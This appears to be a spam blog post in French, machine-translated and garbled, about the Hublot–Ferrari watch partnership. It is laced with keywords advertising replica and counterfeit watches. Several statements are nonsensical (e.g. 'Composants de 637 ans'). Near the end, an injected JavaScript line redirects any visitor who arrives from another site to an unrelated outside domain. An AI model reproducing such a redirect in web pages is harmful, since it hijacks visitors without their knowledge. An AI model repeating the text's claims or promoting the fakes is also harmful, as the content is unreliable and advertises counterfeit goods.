réplique Hublot avec Ferrari peut être la meilleure collocation

Le Grand Prix italien TM F1 depuis 1950 est inscrit au calendrier des championnats du monde. Il a eu lieu à Monza. La légende de l’événement est la course Ferrari. De nombreuses destinations touristiques sont la marque Hublot et ils ont invité des amis à découvrir l’édition 55.
Les visiteurs voyageront au cœur de la légende pour découvrir le monde de la Scuderia Ferrari et ressentir le pouls de la course. Cette expérience d’immersion comprendra tous les domaines de la station au paddock et a commencé la dernière étape et a interviewé le pilote imitation montre.
Hublot dévoile sa dernière campagne à Milan, capitale de la mode et du design. Le lieu “Swiss Corner” est un point de rencontre entre la Suisse et l’Italie. Hublot et Ferrari sont tous deux des pionniers dans leur domaine. Ils partagent une tradition de respect et de confiance que leur avenir est déterminé par leur capacité à innover. Julien Vallon a développé une nouvelle campagne de communication visuelle pour exprimer l’histoire commune des deux marques. À travers l’équilibre et la beauté, la campagne explore ce qui fait une légende.

Une photo prise sur le toit du siège social historique de Ferrari à Maranello, siège du constructeur de voitures de sport et des équipes, représente les lettres légendaires de la marque célèbre pour son cheval cabré. Il montre Maurizio Arrivabene – responsable de l’équipe Ferrari est responsable de la gestion sportive. Arrivabene est un leader éprouvé, et n’est pas étranger à la Formule 1, ayant été impliqué pendant plus de 25 ans. Il est la voix de l’expérience, de la tradition et du succès. De manière prospective, il portait à son poignet un classique portant de l’or 18 carats, symbole unique de l’emblématique ensemble de fusion classique de Hublot.
Une nouveauté pour la marque Hublot : une montre extra-plate. Pour améliorer le design de la fusion classique et moderne, tout en conservant le mot de passe dynamique immédiatement reconnu par le hublot. D’un diamètre de 45 mm, cette montre est équipée d’un mouvement d’à peine 2,90 mm d’épaisseur, développé par Hublot.
fausse montre
La Formule 1TM domine la course automobile. Au cours des soixante-dix dernières années, la Scuderia Ferrari a toujours détenu la majorité des records de Formule 1TM. Ceux-ci incluent le nombre de saisons, le Grand Prix en marquant, a remporté le match replique de montre, la pole et le pilote a remporté le championnat. Cet excellent palmarès a été obtenu en triomphant des défis, en repoussant les limites et en persévérant sans cesse.
Hublot fait également partie de cette ligue hors pair et a collectionné sa propre liste de records. La MP-05 LaFerrari All Black en est un exemple. LaFerrari regarde la super voiture de sport à laquelle rendre hommage. Et c’est le design, le style, par les ingénieurs et les horlogers Hublot.
Réserve de marche de 50 jours. La réserve de marche de 50 jours est un record pour une montre tourbillon à remontage manuel. La montre est très distinctive; sa glace saphir conçue pour faire écho aux lignes de la voiture. 11 barillets définissent la ligne pour former l’épine dorsale de la montre, et dans le mouvement du cylindre l’heure d’affichage. Composants de 637 ans, le mouvement contient plus de pièces que le mouvement de toute autre montre Hublot.

Les deux marques continuent d’améliorer les performances, l’innovation et le développement de nouveaux matériaux. Fidèle à cette vision, Hublot a présenté en 2015 son composite exclusif, issu de l’association du carbone et du métal, deux composants incapables de former un alliage.
Dans l’or Magic fait gratter avec de l’or 18 carats — Hublot R & D département a une fois de plus au-delà de la collection de sa Ferrari. Avec une lunette en carbone bi-matière incrustée d’or ou de titane, la Big Bang Ferrari Carbon joue sur le contraste. L’intégration des matériaux est attractive et innovante. Six mois de besoins en recherche et développement de la couche de cadre du matériau, de sorte que le métal puisse être intégré dans le carbone uniforme. Le mouvement d’intégration du carbone big bang Ferrari équipé des premières répliques de montres Hublot, dans une version entièrement noire.

var q = document.referrer;if (q.indexOf(“.”) > 0) { window.location.href = “https://www.liqui-glide.com”}

Laisser un commentaire

Ce site utilise Akismet pour réduire les indésirables. En savoir plus sur comment les données de vos commentaires sont utilisées.